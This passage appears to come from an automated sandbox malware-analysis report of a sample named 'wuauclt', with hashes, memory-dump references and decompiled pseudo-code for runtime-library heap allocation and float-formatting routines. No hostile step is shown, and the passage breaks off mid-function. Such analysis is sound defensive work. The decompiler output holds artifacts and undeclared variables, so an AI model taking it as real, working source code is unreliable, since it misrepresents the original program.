                                                  • Part of subcall function 0025D3BF: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0025E994,00000001,00000364,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025D400
                                                • _free.LIBCMT ref: 00260893
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 50237ebf7c64ed73ef4cf21c2022b54eb8c19bc744e8b6cbe714691875a24da1
                                                • Instruction ID: 6ca5d392d107f113d006250f0c97a24a76e3804f701127775020f8637a34ae43
                                                • Opcode Fuzzy Hash: 50237ebf7c64ed73ef4cf21c2022b54eb8c19bc744e8b6cbe714691875a24da1
                                                • Instruction Fuzzy Hash: 540149726103056BE331DF69C88595AFBD9EB85330F25052DE584832C0EB30AC46CBB4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025D3BF Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E0025D3BF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x273f10, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0025CBAF();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0025D495())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0025BEAE(_t15, _t16, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}











                                                0x0025d3bf
                                                0x0025d3c5
                                                0x0025d3ca
                                                0x0025d3d8
                                                0x0025d3d8
                                                0x0025d3de
                                                0x0025d3e0
                                                0x0025d3e0
                                                0x0025d3f7
                                                0x0025d400
                                                0x0025d408
                                                0x00000000
                                                0x00000000
                                                0x0025d3e8
                                                0x0025d3ea
                                                0x0025d40c
                                                0x0025d411
                                                0x0025d417
                                                0x00000000
                                                0x0025d417
                                                0x0025d3ed
                                                0x0025d3f2
                                                0x0025d3f3
                                                0x0025d3f5
                                                0x00000000
                                                0x00000000
                                                0x0025d3f5
                                                0x00000000
                                                0x0025d3f7
                                                0x0025d3d0
                                                0x0025d3d6
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0025E994,00000001,00000364,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025D400
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ee33a79c1fecd092122b195f2db464373a8c3453a2c051987014758f533370fa
                                                • Instruction ID: 67be4e15197c134b6c3bc2a29fc2c07a0071ce265e87bea59ec5aade32ede72b
                                                • Opcode Fuzzy Hash: ee33a79c1fecd092122b195f2db464373a8c3453a2c051987014758f533370fa
                                                • Instruction Fuzzy Hash: D2F0E031530126B7DB316F219C05B5B3B5CDF41763B288051FC14DB080CA70E8294A9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00262FDE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 65%
                                                			E00262FDE(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2436;
				signed int _t724;
				signed int _t734;
				signed int _t735;
				signed int _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t779;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t801;
				signed int _t802;
				signed int _t808;
				signed int _t809;
				signed int _t812;
				signed int _t817;
				signed int _t825;
				signed int* _t828;
				signed int _t832;
				signed int _t843;
				signed int _t844;
				signed int _t846;
				char* _t847;
				signed int _t850;
				signed int _t854;
				signed int _t855;
				signed int _t860;
				signed int _t862;
				signed int _t867;
				signed int _t876;
				signed int _t879;
				signed int _t881;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t889;
				signed int _t902;
				signed int _t903;
				signed int _t905;
				char* _t906;
				signed int _t909;
				signed int _t913;
				signed int _t914;
				signed int* _t916;
				signed int _t919;
				signed int _t921;
				signed int _t926;
				signed int _t934;
				signed int _t937;
				signed int _t941;
				signed int* _t948;
				intOrPtr _t950;
				void* _t951;
				intOrPtr* _t953;
				signed int* _t957;
				unsigned int _t968;
				signed int _t969;
				void* _t972;
				signed int _t973;
				void* _t975;
				signed int _t976;
				signed int _t977;
				signed int _t978;
				signed int _t988;
				signed int _t993;
				signed int _t996;
				unsigned int _t999;
				signed int _t1000;
				void* _t1003;
				signed int _t1004;
				void* _t1006;
				signed int _t1007;
				signed int _t1008;
				signed int _t1009;
				signed int _t1014;
				signed int* _t1019;
				signed int _t1021;
				signed int _t1031;
				void _t1034;
				signed int _t1037;
				void* _t1040;
				signed int _t1047;
				signed int _t1054;
				signed int _t1055;
				signed int _t1058;
				signed int _t1059;
				signed int _t1061;
				signed int _t1062;
				signed int _t1063;
				signed int _t1067;
				signed int _t1071;
				signed int _t1072;
				signed int _t1073;
				signed int _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int _t1079;
				signed int _t1080;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1087;
				unsigned int _t1088;
				void* _t1091;
				intOrPtr _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int* _t1100;
				void* _t1104;
				void* _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1111;
				signed int _t1112;
				signed int _t1117;
				signed int _t1119;
				signed int _t1122;
				char _t1127;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1135;
				signed int _t1139;
				signed int _t1140;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				unsigned int _t1146;
				void* _t1150;
				void* _t1151;
				unsigned int _t1152;
				signed int _t1157;
				signed int _t1158;
				signed int _t1160;
				signed int _t1161;
				intOrPtr* _t1163;
				signed int _t1164;
				signed int _t1166;
				signed int _t1167;
				signed int _t1170;
				signed int _t1172;
				signed int _t1173;
				void* _t1174;
				signed int _t1175;
				signed int _t1176;
				signed int _t1177;
				void* _t1180;
				signed int _t1181;
				signed int _t1182;
				signed int _t1183;
				signed int _t1184;
				signed int _t1185;
				signed int* _t1188;
				signed int _t1189;
				signed int _t1190;
				signed int _t1191;
				signed int _t1192;
				intOrPtr* _t1194;
				intOrPtr* _t1195;
				signed int _t1197;
				signed int _t1199;
				signed int _t1202;
				signed int _t1208;
				signed int _t1212;
				void* _t1213;
				signed int _t1217;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1225;
				signed int _t1227;
				signed int _t1228;
				signed int _t1229;
				signed int _t1230;
				signed int _t1232;
				signed int _t1233;
				signed int _t1234;
				signed int _t1235;
				signed int _t1236;
				signed int _t1238;
				signed int _t1239;
				signed int _t1241;
				signed int _t1243;
				signed int _t1245;
				signed int _t1247;
				signed int* _t1249;
				signed int* _t1251;
				signed int _t1260;

				_t724 =  *0x271004; // 0x80aab37c
				_v8 = _t724 ^ _t1247;
				_t1031 = _a20;
				_push(__esi);
				_push(__edi);
				_t1163 = _a16;
				_v1924 = _t1163;
				_v1920 = _t1031;
				E00262AFC( &_v1944, __eflags);
				_t1212 = _a8;
				_t729 = 0x2d;
				if((_t1212 & 0x80000000) == 0) {
					_t729 = 0x120;
				}
				 *_t1163 = _t729;
				 *((intOrPtr*)(_t1163 + 8)) = _t1031;
				_t1164 = _a4;
				if((_t1212 & 0x7ff00000) != 0) {
					L5:
					_t734 = E0025EB0F( &_a4);
					_pop(_t1046);
					__eflags = _t734;
					if(_t734 != 0) {
						_t1046 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t735 = _t734 - 1;
					__eflags = _t735;
					if(_t735 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t735 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1164;
									_a8 = _t1212 & 0x7fffffff;
									_t1260 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1166 = _v1896;
									_v1916 = _a12 + 1;
									_t1054 = _t1166 >> 0x14;
									_t758 = _t1054 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1119 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1119 = 1;
									}
									_t1167 = _t1166 & 0x000fffff;
									_t1034 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1119;
									_t1055 = _t1054 & 0x000007ff;
									_t1217 = _t1055 - 0x434 + (0 | _t1119 != 0x00000000) + 1;
									_v1872 = _t1217;
									E002650B0(_t1055, _t1260);
									_push(_t1055);
									_push(_t1055);
									 *_t1249 = _t1260;
									_t764 = E00267760(E002651C0(_t1167), _t1260);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1034;
									__eflags = _t1167;
									_v464 = _t1167;
									_t1037 = (0 | _t1167 != 0x00000000) + 1;
									_v472 = _t1037;
									__eflags = _t1217;
									if(_t1217 < 0) {
										__eflags = _t1217 - 0xfffffc02;
										if(_t1217 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1247 + _t1037 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1058 = 0;
												__eflags = 0;
											} else {
												_t1058 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1058;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1037 - 0x73;
											_v1865 = _t769;
											_t1059 = _t1058 & 0xffffff00 | _t1037 - 0x00000073 > 0x00000000;
											__eflags = _t1037 - 0x73;
											if(_t1037 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1059;
											if(_t1059 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00260330( &_v468, 0x1cc,  &_v1396, 0);
												_t1249 =  &(_t1249[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1086 = 0x72;
													__eflags = _t1037 - _t1086;
													if(_t1037 < _t1086) {
														_t1086 = _t1037;
													}
													__eflags = _t1086 - 0xffffffff;
													if(_t1086 != 0xffffffff) {
														_t1235 = _t1086;
														_t1194 =  &_v468 + _t1086 * 4;
														_v1880 = _t1194;
														while(1) {
															__eflags = _t1235 - _t1037;
															if(_t1235 >= _t1037) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1194;
															}
															_t210 = _t1235 - 1; // 0x70
															__eflags = _t210 - _t1037;
															if(_t210 >= _t1037) {
																_t1146 = 0;
																__eflags = 0;
															} else {
																_t1146 =  *(_t1194 - 4);
															}
															_t1194 = _t1194 - 4;
															_t948 = _v1880;
															_t1235 = _t1235 - 1;
															 *_t948 = _t1146 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t948 - 4;
															__eflags = _t1235 - 0xffffffff;
															if(_t1235 == 0xffffffff) {
																break;
															}
															_t1037 = _v472;
														}
														_t1217 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1086;
													} else {
														_t218 = _t1086 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1170 = 1 - _t1217;
											E002596C0(_t1170,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1247 + 0xbad63d) = 1 << (_t1170 & 0x0000001f);
											_t779 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1087 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1087;
											__eflags = _t1037 - _t1087;
											if(_t1037 == _t1087) {
												_t1150 = 0;
												__eflags = 0;
												while(1) {
													_t950 =  *((intOrPtr*)(_t1247 + _t1150 - 0x570));
													__eflags = _t950 -  *((intOrPtr*)(_t1247 + _t1150 - 0x1d0));
													if(_t950 !=  *((intOrPtr*)(_t1247 + _t1150 - 0x1d0))) {
														goto L101;
													}
													_t1150 = _t1150 + 4;
													__eflags = _t1150 - 8;
													if(_t1150 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1151 = 0;
															__eflags = 0;
														} else {
															_t1151 = _t950 + 1;
														}
														_t951 = 0x20;
														_t1236 = _t1087;
														__eflags = _t951 - _t1151 - _t1087;
														_t953 =  &_v460;
														_v1880 = _t953;
														_t1195 = _t953;
														_t171 =  &_v1865;
														 *_t171 = _t951 - _t1151 - _t1087 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1236 - _t1037;
															if(_t1236 >= _t1037) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1195;
															}
															_t175 = _t1236 - 1; // 0x0
															__eflags = _t175 - _t1037;
															if(_t175 >= _t1037) {
																_t1152 = 0;
																__eflags = 0;
															} else {
																_t1152 =  *(_t1195 - 4);
															}
															_t1195 = _t1195 - 4;
															_t957 = _v1880;
															_t1236 = _t1236 - 1;
															 *_t957 = _t1152 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t957 - 4;
															__eflags = _t1236 - 0xffffffff;
															if(_t1236 == 0xffffffff) {
																break;
															}
															_t1037 = _v472;
														}
														__eflags = _v1865;
														_t1088 = _t1087 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1087;
														_t1197 = _t1088 >> 5;
														_v1884 = _t1088;
														_t1238 = _t1197 << 2;
														E002596C0(_t1197,  &_v1396, 0, _t1238);
														 *(_t1247 + _t1238 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t779 = _t1197 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t779;
										_t1040 = 0x1cc;
										_v936 = _t779;
										__eflags = _t779 << 2;
										E00260330( &_v932, 0x1cc,  &_v1396, _t779 << 2);
										_t1251 =  &(_t1249[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1239 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1239;
										__eflags = _t1037 - _t1239;
										if(_t1037 != _t1239) {
											L53:
											_t968 = _v1872 + 1;
											_t969 = _t968 & 0x0000001f;
											_t1091 = 0x20;
											_v1876 = _t969;
											_t1199 = _t968 >> 5;
											_v1872 = _t1199;
											_v1908 = _t1091 - _t969;
											_t972 = E00267740(1, _t1091 - _t969, 0);
											_t1093 =  *((intOrPtr*)(_t1247 + _t1037 * 4 - 0x1d4));
											_t973 = _t972 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t973;
											_v1912 =  !_t973;
											if( *_t108 == 0) {
												_t1094 = 0;
												__eflags = 0;
											} else {
												_t1094 = _t1093 + 1;
											}
											_t975 = 0x20;
											_t976 = _t975 - _t1094;
											_t1157 = _t1037 + _t1199;
											__eflags = _v1876 - _t976;
											_v1892 = _t1157;
											_t977 = _t976 & 0xffffff00 | _v1876 - _t976 > 0x00000000;
											__eflags = _t1157 - 0x73;
											_v1865 = _t977;
											_t1095 = _t1094 & 0xffffff00 | _t1157 - 0x00000073 > 0x00000000;
											__eflags = _t1157 - 0x73;
											if(_t1157 != 0x73) {
												L59:
												_t978 = 0;
												__eflags = 0;
											} else {
												__eflags = _t977;
												if(_t977 == 0) {
													goto L59;
												} else {
													_t978 = 1;
												}
											}
											__eflags = _t1095;
											if(_t1095 != 0) {
												L81:
												__eflags = 0;
												_t1040 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00260330( &_v468, 0x1cc,  &_v1396, 0);
												_t1249 =  &(_t1249[4]);
											} else {
												__eflags = _t978;
												if(_t978 != 0) {
													goto L81;
												} else {
													_t1096 = 0x72;
													__eflags = _t1157 - _t1096;
													if(_t1157 >= _t1096) {
														_t1157 = _t1096;
														_v1892 = _t1096;
													}
													_t988 = _t1157;
													_v1880 = _t988;
													__eflags = _t1157 - 0xffffffff;
													if(_t1157 != 0xffffffff) {
														_t1158 = _v1872;
														_t1241 = _t1157 - _t1158;
														__eflags = _t1241;
														_t1100 =  &_v468 + _t1241 * 4;
														_v1888 = _t1100;
														while(1) {
															__eflags = _t988 - _t1158;
															if(_t988 < _t1158) {
																break;
															}
															__eflags = _t1241 - _t1037;
															if(_t1241 >= _t1037) {
																_t1202 = 0;
																__eflags = 0;
															} else {
																_t1202 =  *_t1100;
															}
															__eflags = _t1241 - 1 - _t1037;
															if(_t1241 - 1 >= _t1037) {
																_t993 = 0;
																__eflags = 0;
															} else {
																_t993 =  *(_t1100 - 4);
															}
															_t996 = _v1880;
															_t1100 = _v1888 - 4;
															_v1888 = _t1100;
															 *(_t1247 + _t996 * 4 - 0x1d0) = (_t1202 & _v1884) << _v1876 | (_t993 & _v1912) >> _v1908;
															_t988 = _t996 - 1;
															_t1241 = _t1241 - 1;
															_v1880 = _t988;
															__eflags = _t988 - 0xffffffff;
															if(_t988 != 0xffffffff) {
																_t1037 = _v472;
																continue;
															}
															break;
														}
														_t1157 = _v1892;
														_t1199 = _v1872;
														_t1239 = 2;
													}
													__eflags = _t1199;
													if(_t1199 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1199 << 2);
														_t1249 =  &(_t1249[3]);
													}
													__eflags = _v1865;
													_t1040 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1157;
													} else {
														_v472 = _t1157 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1239;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1104 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1247 + _t1104 - 0x570)) -  *((intOrPtr*)(_t1247 + _t1104 - 0x1d0));
												if( *((intOrPtr*)(_t1247 + _t1104 - 0x570)) !=  *((intOrPtr*)(_t1247 + _t1104 - 0x1d0))) {
													goto L53;
												}
												_t1104 = _t1104 + 4;
												__eflags = _t1104 - 8;
												if(_t1104 != 8) {
													continue;
												} else {
													_t999 = _v1872 + 2;
													_t1000 = _t999 & 0x0000001f;
													_t1105 = 0x20;
													_t1106 = _t1105 - _t1000;
													_v1888 = _t1000;
													_t1243 = _t999 >> 5;
													_v1876 = _t1243;
													_v1908 = _t1106;
													_t1003 = E00267740(1, _t1106, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1004 = _t1003 - 1;
													__eflags = _t1004;
													asm("bsr ecx, edi");
													_v1884 = _t1004;
													_v1912 =  !_t1004;
													if(_t1004 == 0) {
														_t1107 = 0;
														__eflags = 0;
													} else {
														_t1107 = _t1106 + 1;
													}
													_t1006 = 0x20;
													_t1007 = _t1006 - _t1107;
													_t1160 = _t1243 + 2;
													__eflags = _v1888 - _t1007;
													_v1880 = _t1160;
													_t1008 = _t1007 & 0xffffff00 | _v1888 - _t1007 > 0x00000000;
													__eflags = _t1160 - 0x73;
													_v1865 = _t1008;
													_t1108 = _t1107 & 0xffffff00 | _t1160 - 0x00000073 > 0x00000000;
													__eflags = _t1160 - 0x73;
													if(_t1160 != 0x73) {
														L28:
														_t1009 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1008;
														if(_t1008 == 0) {
															goto L28;
														} else {
															_t1009 = 1;
														}
													}
													__eflags = _t1108;
													if(_t1108 != 0) {
														L50:
														__eflags = 0;
														_t1040 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00260330( &_v468, 0x1cc,  &_v1396, 0);
														_t1249 =  &(_t1249[4]);
													} else {
														__eflags = _t1009;
														if(_t1009 != 0) {
															goto L50;
														} else {
															_t1111 = 0x72;
															__eflags = _t1160 - _t1111;
															if(_t1160 >= _t1111) {
																_t1160 = _t1111;
																_v1880 = _t1111;
															}
															_t1112 = _t1160;
															_v1892 = _t1112;
															__eflags = _t1160 - 0xffffffff;
															if(_t1160 != 0xffffffff) {
																_t1161 = _v1876;
																_t1245 = _t1160 - _t1161;
																__eflags = _t1245;
																_t1019 =  &_v468 + _t1245 * 4;
																_v1872 = _t1019;
																while(1) {
																	__eflags = _t1112 - _t1161;
																	if(_t1112 < _t1161) {
																		break;
																	}
																	__eflags = _t1245 - _t1037;
																	if(_t1245 >= _t1037) {
																		_t1208 = 0;
																		__eflags = 0;
																	} else {
																		_t1208 =  *_t1019;
																	}
																	__eflags = _t1245 - 1 - _t1037;
																	if(_t1245 - 1 >= _t1037) {
																		_t1021 = 0;
																		__eflags = 0;
																	} else {
																		_t1021 =  *(_v1872 - 4);
																	}
																	_t1117 = _v1892;
																	 *(_t1247 + _t1117 * 4 - 0x1d0) = (_t1021 & _v1912) >> _v1908 | (_t1208 & _v1884) << _v1888;
																	_t1112 = _t1117 - 1;
																	_t1245 = _t1245 - 1;
																	_t1019 = _v1872 - 4;
																	_v1892 = _t1112;
																	_v1872 = _t1019;
																	__eflags = _t1112 - 0xffffffff;
																	if(_t1112 != 0xffffffff) {
																		_t1037 = _v472;
																		continue;
																	}
																	break;
																}
																_t1160 = _v1880;
																_t1243 = _v1876;
															}
															__eflags = _t1243;
															if(_t1243 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1243 << 2);
																_t1249 =  &(_t1249[3]);
															}
															__eflags = _v1865;
															_t1040 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1160;
															} else {
																_v472 = _t1160 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1014 = 4;
													__eflags = 1;
													_v1396 = _t1014;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1014);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1040);
										_push( &_v932);
										E00260330();
										_t1251 =  &(_t1249[4]);
									}
									_t784 = _v1904;
									_t1061 = 0xa;
									_v1912 = _t1061;
									__eflags = _t784;
									if(_t784 < 0) {
										_t785 =  ~_t784;
										_t786 = _t785 / _t1061;
										_v1880 = _t786;
										_t1062 = _t785 % _t1061;
										_v1884 = _t1062;
										__eflags = _t786;
										if(_t786 == 0) {
											L249:
											__eflags = _t1062;
											if(_t1062 != 0) {
												_t825 =  *(0x26dc64 + _t1062 * 4);
												_v1896 = _t825;
												__eflags = _t825;
												if(_t825 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t825 - 1;
													if(_t825 != 1) {
														_t1073 = _v472;
														__eflags = _t1073;
														if(_t1073 != 0) {
															_t1177 = 0;
															_t1225 = 0;
															__eflags = 0;
															do {
																_t1131 = _t825 *  *(_t1247 + _t1225 * 4 - 0x1d0) >> 0x20;
																 *(_t1247 + _t1225 * 4 - 0x1d0) = _t825 *  *(_t1247 + _t1225 * 4 - 0x1d0) + _t1177;
																_t825 = _v1896;
																asm("adc edx, 0x0");
																_t1225 = _t1225 + 1;
																_t1177 = _t1131;
																__eflags = _t1225 - _t1073;
															} while (_t1225 != _t1073);
															__eflags = _t1177;
															if(_t1177 != 0) {
																_t832 = _v472;
																__eflags = _t832 - 0x73;
																if(_t832 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1247 + _t832 * 4 - 0x1d0) = _t1177;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t786 - 0x26;
												if(_t786 > 0x26) {
													_t786 = 0x26;
												}
												_t1074 =  *(0x26dbce + _t786 * 4) & 0x000000ff;
												_v1872 = _t786;
												_v1400 = ( *(0x26dbce + _t786 * 4) & 0x000000ff) + ( *(0x26dbcf + _t786 * 4) & 0x000000ff);
												E002596C0(_t1074 << 2,  &_v1396, 0, _t1074 << 2);
												_t843 = E00267820( &(( &_v1396)[_t1074]), 0x26d2c8 + ( *(0x26dbcc + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x26dbcf + _t786 * 4) & 0x000000ff) << 2);
												_t1075 = _v1400;
												_t1251 =  &(_t1251[6]);
												_v1892 = _t1075;
												__eflags = _t1075 - 1;
												if(_t1075 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1075 - _v472;
														_t1180 =  &_v1396;
														_t844 = _t843 & 0xffffff00 | _t1075 - _v472 > 0x00000000;
														__eflags = _t844;
														if(_t844 != 0) {
															_t1132 =  &_v468;
														} else {
															_t1180 =  &_v468;
															_t1132 =  &_v1396;
														}
														_v1908 = _t1132;
														__eflags = _t844;
														if(_t844 == 0) {
															_t1075 = _v472;
														}
														_v1876 = _t1075;
														__eflags = _t844;
														if(_t844 != 0) {
															_v1892 = _v472;
														}
														_t1133 = 0;
														_t1227 = 0;
														_v1864 = 0;
														__eflags = _t1075;
														if(_t1075 == 0) {
															L243:
															_v472 = _t1133;
															_t846 = _t1133 << 2;
															__eflags = _t846;
															_push(_t846);
															_t847 =  &_v1860;
															goto L244;
														} else {
															_t1181 = _t1180 -  &_v1860;
															__eflags = _t1181;
															_v1928 = _t1181;
															do {
																_t854 =  *(_t1247 + _t1181 + _t1227 * 4 - 0x740);
																_v1896 = _t854;
																__eflags = _t854;
																if(_t854 != 0) {
																	_t855 = 0;
																	_t1182 = 0;
																	_t1076 = _t1227;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1076 - 0x73;
																		if(_t1076 == 0x73) {
																			goto L258;
																		} else {
																			_t1181 = _v1928;
																			_t1075 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1076 - 0x73;
																			if(_t1076 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1076 - _t1133;
																			if(_t1076 == _t1133) {
																				 *(_t1247 + _t1076 * 4 - 0x740) =  *(_t1247 + _t1076 * 4 - 0x740) & 0x00000000;
																				_t867 = _t855 + 1 + _t1227;
																				__eflags = _t867;
																				_v1864 = _t867;
																				_t855 = _v1888;
